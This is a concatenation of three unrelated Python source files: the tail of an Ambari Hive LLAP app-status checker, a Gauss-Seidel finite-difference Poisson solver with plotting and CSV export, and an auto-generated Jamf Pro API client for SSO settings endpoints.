next_elem.startswith('"state" : ') and (splits[idx + 2]).strip() == '}': # For Case 'B' marker_idx = idx break; # Remove extra logging from possible JSON output if marker_idx is None: raise Fail("Couldn't validate the received output for JSON parsing.") else: if marker_idx != 0: del splits[0:marker_idx] scanned_output = '\n'.join(splits) llap_app_info = json.loads(scanned_output) return llap_app_info """ Checks llap app status. 
The states can be : 'COMPLETE', 'APP_NOT_FOUND', 'RUNNING_PARTIAL', 'RUNNING_ALL' & 'LAUNCHING'. if app is in 'APP_NOT_FOUND', 'RUNNING_PARTIAL' and 'LAUNCHING' state: we wait for 'num_times_to_wait' to have app in (1). 'RUNNING_ALL' or (2). 'RUNNING_PARTIAL' state with 80% or more 'desiredInstances' running and Return True else : Return False Parameters: llap_app_name : deployed llap app name. num_retries : Number of retries to check the LLAP app status. """ def check_llap_app_status_in_llap_tp(self, llap_app_name, num_retries, return_immediately_if_stopped=False): curr_time = time.time() num_retries = int(num_retries) if num_retries <= 0: Logger.info("Read 'num_retries' as : {0}. Setting it to : {1}".format(num_retries, 2)) num_retries = 2 if num_retries > 20000000000: Logger.info("Read 'num_retries' as : {0}. Setting it to : {1}".format(num_retries, 1000)) num_retries = 1000 @retry(times=num_retries, sleep_time=2, err_class=Fail) def do_retries(): llap_app_info = self._get_llap_app_status_info_in_llap_tp(llap_app_name) return self._verify_llap_app_status(llap_app_info, llap_app_name, return_immediately_if_stopped, curr_time) try: status = do_retries() return status except Exception, e: Logger.info("LLAP app '{0}' did not come up after a wait of {1} seconds.".format(llap_app_name, time.time() - curr_time)) traceback.print_exc() return False def check_llap_app_status_in_llap_ga(self, llap_app_name, num_retries, return_immediately_if_stopped=False): curr_time = time.time() total_timeout = int(num_retries) * 20; # Total wait time while checking the status via llapstatus command Logger.debug("Calculated 'total_timeout' : {0} using config 'num_retries_for_checking_llap_status' : {1}".format(total_timeout, num_retries)) refresh_rate = 2 # Frequency of checking the llapstatus percent_desired_instances_to_be_up = 80 # Out of 100. llap_app_info = self._get_llap_app_status_info_in_llap_ga(percent_desired_instances_to_be_up/100.0, total_timeout, refresh_rate) try: return self._verify_llap_app_status(llap_app_info, llap_app_name, return_immediately_if_stopped, curr_time) except Exception as e: Logger.info(e.message) return False def get_log_folder(self): import params return params.hive_log_dir def get_user(self): import params return params.hive_user def _verify_llap_app_status(self, llap_app_info, llap_app_name, return_immediately_if_stopped, curr_time): if llap_app_info is None or 'state' not in llap_app_info: Logger.error("Malformed JSON data received for LLAP app. Exiting ....") return False # counters based on various states. live_instances = 0 desired_instances = 0 percent_desired_instances_to_be_up = 80 # Used in 'RUNNING_PARTIAL' state. if return_immediately_if_stopped and (llap_app_info['state'].upper() in ('APP_NOT_FOUND', 'COMPLETE')): return False if llap_app_info['state'].upper() == 'RUNNING_ALL': Logger.info( "LLAP app '{0}' in '{1}' state.".format(llap_app_name, llap_app_info['state'])) return True elif llap_app_info['state'].upper() == 'RUNNING_PARTIAL': # Check how many instances were up. if 'liveInstances' in llap_app_info and 'desiredInstances' in llap_app_info: live_instances = llap_app_info['liveInstances'] desired_instances = llap_app_info['desiredInstances'] else: Logger.info( "LLAP app '{0}' is in '{1}' state, but 'instances' information not available in JSON received. " \ "Exiting ....".format(llap_app_name, llap_app_info['state'])) Logger.info(llap_app_info) return False if desired_instances == 0: Logger.info("LLAP app '{0}' desired instance are set to 0. 
Exiting ....".format(llap_app_name)) return False percentInstancesUp = 0 if live_instances > 0: percentInstancesUp = float(live_instances) / desired_instances * 100 if percentInstancesUp >= percent_desired_instances_to_be_up: Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}' >= {3}% of Desired Instances : " \ "'{4}'.".format(llap_app_name, llap_app_info['state'], llap_app_info['liveInstances'], percent_desired_instances_to_be_up, llap_app_info['desiredInstances'])) return True else: Logger.info("LLAP app '{0}' in '{1}' state. Live Instances : '{2}'. Desired Instances : " \ "'{3}' after {4} secs.".format(llap_app_name, llap_app_info['state'], llap_app_info['liveInstances'], llap_app_info['desiredInstances'], time.time() - curr_time)) raise Fail("App state is RUNNING_PARTIAL. Live Instances : '{0}', Desired Instance : '{1}'".format(llap_app_info['liveInstances'], llap_app_info['desiredInstances'])) elif llap_app_info['state'].upper() in ['APP_NOT_FOUND', 'LAUNCHING', 'COMPLETE']: status_str = format("LLAP app '{0}' current state is {1}.".format(llap_app_name, llap_app_info['state'])) Logger.info(status_str) raise Fail(status_str) else: # Covers any unknown that we get. Logger.info( "LLAP app '{0}' current state is '{1}'. Expected : 'RUNNING'.".format(llap_app_name, llap_app_info['state'])) return False @OsFamilyImpl(os_family=OSConst.WINSRV_FAMILY) class HiveServerInteractiveWindows(HiveServerInteractive): def status(self, env): pass if __name__ == "__main__": HiveServerInteractive().execute() poissonGS.py # -*- coding: utf-8 -*- """ Created on Thu Apr 23 15:21:15 2020 @author: Wei-shan Solving Poisson Equation del^2 V = -rho in the electric potential problem with Finite difference of Gauss-Seidel Method and overrelaxation. Reference: , Computational Physics, CH9. 
""" from pylab import imshow,gray,show import numpy as np import matplotlib.pyplot as plt from matplotlib.ticker import AutoMinorLocator import pandas as pd # Constants M = 100 # Grid squares on a side V = 30.0 # Voltage at top wall rho = 1.0 # charge density target = 1e-6 # Target accuracy omega = 0.9 delta = 1.0 xMin = 0.0 xMax = 100.0 yMin = 0.0 yMax = 100.0 # Create arrays to hold potential values phi = np.zeros([M+1,M+1],float) # phi[y,x] # Main loop while delta>target: delta = 0.0 # Calculate new values of the potential for i in range(M+1): for j in range(M+1): ## Setting up boundary conditions (Simulation 1) if i==0: phi[i,j] = V elif j==0: phi[i,j] = V elif i==M: phi[i,j] = -V elif j==M: #or j==M: # something is wrong for setting phi[i,j]=V at i==M or j==M phi[i,j] = -V ## End of Setting up boundary conditions (Simulation 1No) ## Setting up other boundary values inside the digram (Simulation 3) #if i==0 or i==M or j==0 or j==M: # phi[i,j] = 0.0 #elif (i>=20 and i<=80) and j==20: # phi[i,j]=V #elif (i>=20 and i<=80) and j==80: # phi[i,j]=-V ## End of Setting up other boundary values inside the digram (Simulation 3) ## Charge densit ## Setting up rho value (Simulation 2) elif ( ( i>=20 and i<=40 ) and ( j>=60 and j<=80 ) ): temp = (phi[i+1,j] + phi[i-1,j] + phi[i,j+1] + phi[i,j-1])*(1+omega)/4 - omega * phi[i,j] + 1/4*rho if ( abs( phi[i,j] - temp ) > delta ): delta = abs( phi[i,j] - temp ) phi[i,j] = temp #elif ( ( i>=60 and i<=80 ) and ( j>=20 and j<=40 ) ): # temp = (phi[i+1,j] + phi[i-1,j] + phi[i,j+1] + phi[i,j-1])*(1+omega)/4 - omega * phi[i,j] - 1/4*rho # if ( abs( phi[i,j] - temp ) > delta ): delta = abs( phi[i,j] - temp ) # phi[i,j] = temp ## End of Setting up rho value (Simulation 2) else: temp = (phi[i+1,j] + phi[i-1,j] + phi[i,j+1] + phi[i,j-1])*(1+omega)/4 - omega * phi[i,j] if ( abs( phi[i,j] - temp ) > delta ): delta = abs( phi[i,j] - temp ) phi[i,j] = temp # End of main loop # Make a plot ax = plt.gca() imshow(phi,extent=[xMin,xMax,yMin,yMax])#,origin="lower") plt.minorticks_on() minorLocatorX = AutoMinorLocator(4) # number of minor intervals per major # inteval minorLocatorY = AutoMinorLocator(4) ax.xaxis.set_minor_locator(minorLocatorX) # add minor ticks on x axis ax.yaxis.set_minor_locator(minorLocatorY) # add minor ticks on y axis ax.set_xticklabels(ax.get_xticks(),family='monospace',fontsize=10) ax.set_yticklabels(ax.get_yticks(),family='monospace',fontsize=10) gray() show() # Save location vs voltage into csv file. phiData = pd.DataFrame(columns = ['X','Y','Voltage']) phiData_file = open(r'E:\github\Solving-Poisson-Equation-with-finite-difference-Gauss-Seidel-Method\poissonGS.csv','w',newline='') X = [] Y = [] Voltage = [] for i in range(M+1): for j in range(M+1): X += [j * (xMax-xMin)/M] Y += [i * (yMax-yMin)/M] Voltage += [ phi[i,j] ] phiData['X'] = X phiData['Y'] = Y phiData['Voltage'] = Voltage phiData.to_csv(phiData_file, sep=',', encoding='utf-8', index=False) phiData_file.close()# coding: utf-8 """ Jamf Pro API ## Overview This is a sample Jamf Pro server which allows for usage without any authentication. The Jamf Pro environment which supports the Try it Out functionality does not run the current beta version of Jamf Pro, thus any newly added endpoints will result in an error and should be used soley for documentation purposes. 
# noqa: E501 The version of the OpenAPI document: 10.25.0 Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from jamf.api_client import ApiClient from jamf.exceptions import ( # noqa: F401 ApiTypeError, ApiValueError ) class SsoSettingsApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def v1_sso_dependencies_get(self, **kwargs): # noqa: E501 """Retrieve the list of Enrollment Customizations using SSO # noqa: E501 Retrieves the list of Enrollment Customizations using SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_dependencies_get(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: EnrollmentCustomizationDependencies """ kwargs['_return_http_data_only'] = True return self.v1_sso_dependencies_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_dependencies_get_with_http_info(self, **kwargs): # noqa: E501 """Retrieve the list of Enrollment Customizations using SSO # noqa: E501 Retrieves the list of Enrollment Customizations using SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_dependencies_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: tuple(EnrollmentCustomizationDependencies, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_dependencies_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "EnrollmentCustomizationDependencies", } return self.api_client.call_api( '/v1/sso/dependencies', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_disable_post(self, **kwargs): # noqa: E501 """Disable SSO # noqa: E501 Disable SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_disable_post(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ kwargs['_return_http_data_only'] = True return self.v1_sso_disable_post_with_http_info(**kwargs) # noqa: E501 def v1_sso_disable_post_with_http_info(self, **kwargs): # noqa: E501 """Disable SSO # noqa: E501 Disable SSO # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_disable_post_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. 
:param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: None """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_disable_post" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # Authentication setting auth_settings = [] # noqa: E501 response_types_map = {} return self.api_client.call_api( '/v1/sso/disable', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_get(self, **kwargs): # noqa: E501 """Retrieve the current Single Sign On configuration settings # noqa: E501 Retrieves the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_get(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: SsoSettings """ kwargs['_return_http_data_only'] = True return self.v1_sso_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_get_with_http_info(self, **kwargs): # noqa: E501 """Retrieve the current Single Sign On configuration settings # noqa: E501 Retrieves the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. 
It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(SsoSettings, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "SsoSettings", } return self.api_client.call_api( '/v1/sso', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_history_get(self, **kwargs): # noqa: E501 """Get SSO history object # noqa: E501 Gets SSO history object # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_get(async_req=True) >>> result = thread.get() :param page: :type page: int :param page_size: :type page_size: int :param sort: Sorting criteria in the format: property:asc/desc. Default sort is date:desc. Multiple sort criteria are supported and must be separated with a comma. Example: sort=date:desc,name:asc :type sort: list[str] :param filter: Query in the RSQL format, allowing to filter history notes collection. Default filter is empty query - returning all results for the requested page. Fields allowed in the query: username, date, note, details. This param can be combined with paging and sorting. Example: filter=username!=admin and details==*disabled* and date<2019-12-15 :type filter: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
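Calling this generated client follows one pattern throughout: construct the api class around an ApiClient and invoke the endpoint method, optionally with async_req=True to get a thread whose get() yields the result. A minimal sketch against the SSO settings endpoint above, assuming a properly configured and reachable Jamf Pro server:

from jamf.api_client import ApiClient

api = SsoSettingsApi(ApiClient())          # ApiClient() defaults, as in __init__ above

sso_settings = api.v1_sso_get()            # synchronous call, returns an SsoSettings model

thread = api.v1_sso_get(async_req=True)    # asynchronous variant documented in the docstrings
sso_settings_async = thread.get()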
:rtype: HistorySearchResults """ kwargs['_return_http_data_only'] = True return self.v1_sso_history_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_history_get_with_http_info(self, **kwargs): # noqa: E501 """Get SSO history object # noqa: E501 Gets SSO history object # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_get_with_http_info(async_req=True) >>> result = thread.get() :param page: :type page: int :param page_size: :type page_size: int :param sort: Sorting criteria in the format: property:asc/desc. Default sort is date:desc. Multiple sort criteria are supported and must be separated with a comma. Example: sort=date:desc,name:asc :type sort: list[str] :param filter: Query in the RSQL format, allowing to filter history notes collection. Default filter is empty query - returning all results for the requested page. Fields allowed in the query: username, date, note, details. This param can be combined with paging and sorting. Example: filter=username!=admin and details==*disabled* and date<2019-12-15 :type filter: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: tuple(HistorySearchResults, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'page', 'page_size', 'sort', 'filter' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_history_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501 query_params.append(('page', local_var_params['page'])) # noqa: E501 if 'page_size' in local_var_params and local_var_params['page_size'] is not None: # noqa: E501 query_params.append(('page-size', local_var_params['page_size'])) # noqa: E501 if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501 query_params.append(('sort', local_var_params['sort'])) # noqa: E501 collection_formats['sort'] = 'multi' # noqa: E501 if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501 query_params.append(('filter', local_var_params['filter'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "HistorySearchResults", } return self.api_client.call_api( '/v1/sso/history', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_history_post(self, object_history_note, **kwargs): # noqa: E501 """Add SSO history object notes # noqa: E501 Adds SSO history object notes # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_post(object_history_note, async_req=True) >>> result = thread.get() :param object_history_note: history notes to create (required) :type object_history_note: ObjectHistoryNote :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
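The history endpoint above additionally supports paging, multi-key sorting and RSQL filtering, with sort serialized as repeated query parameters (collection format 'multi'). A short usage sketch reusing the docstring's own filter example; the server and data are assumed:

api = SsoSettingsApi()   # defaults to a fresh ApiClient()

history = api.v1_sso_history_get(
    page=0,
    page_size=100,
    sort=["date:desc", "name:asc"],
    filter="username!=admin and details==*disabled* and date<2019-12-15",
)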
:rtype: HrefResponse """ kwargs['_return_http_data_only'] = True return self.v1_sso_history_post_with_http_info(object_history_note, **kwargs) # noqa: E501 def v1_sso_history_post_with_http_info(self, object_history_note, **kwargs): # noqa: E501 """Add SSO history object notes # noqa: E501 Adds SSO history object notes # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_history_post_with_http_info(object_history_note, async_req=True) >>> result = thread.get() :param object_history_note: history notes to create (required) :type object_history_note: ObjectHistoryNote :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(HrefResponse, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'object_history_note' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_history_post" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'object_history_note' is set if self.api_client.client_side_validation and ('object_history_note' not in local_var_params or # noqa: E501 local_var_params['object_history_note'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `object_history_note` when calling `v1_sso_history_post`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'object_history_note' in local_var_params: body_params = local_var_params['object_history_note'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 201: "HrefResponse", 503: "ApiError", } return self.api_client.call_api( '/v1/sso/history', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), 
collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_metadata_download_get(self, **kwargs): # noqa: E501 """Download the Jamf Pro SAML metadata file # noqa: E501 Download the Jamf Pro SAML metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_metadata_download_get(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.v1_sso_metadata_download_get_with_http_info(**kwargs) # noqa: E501 def v1_sso_metadata_download_get_with_http_info(self, **kwargs): # noqa: E501 """Download the Jamf Pro SAML metadata file # noqa: E501 Download the Jamf Pro SAML metadata file # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_metadata_download_get_with_http_info(async_req=True) >>> result = thread.get() :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. 
:rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method v1_sso_metadata_download_get" % key ) local_var_params[key] = val del local_var_params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['text/plain']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 response_types_map = { 200: "file", } return self.api_client.call_api( '/v1/sso/metadata/download', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def v1_sso_put(self, sso_settings, **kwargs): # noqa: E501 """Updates the current Single Sign On configuration settings # noqa: E501 Updates the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_put(sso_settings, async_req=True) >>> result = thread.get() :param sso_settings: (required) :type sso_settings: SsoSettings :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: SsoSettings """ kwargs['_return_http_data_only'] = True return self.v1_sso_put_with_http_info(sso_settings, **kwargs) # noqa: E501 def v1_sso_put_with_http_info(self, sso_settings, **kwargs): # noqa: E501 """Updates the current Single Sign On configuration settings # noqa: E501 Updates the current Single Sign On configuration settings # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.v1_sso_put_with_http_info(sso_settings, async_req=True) >>> result = thread.get() :param sso_settings: (required) :type sso_settings: SsoSettings :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. 
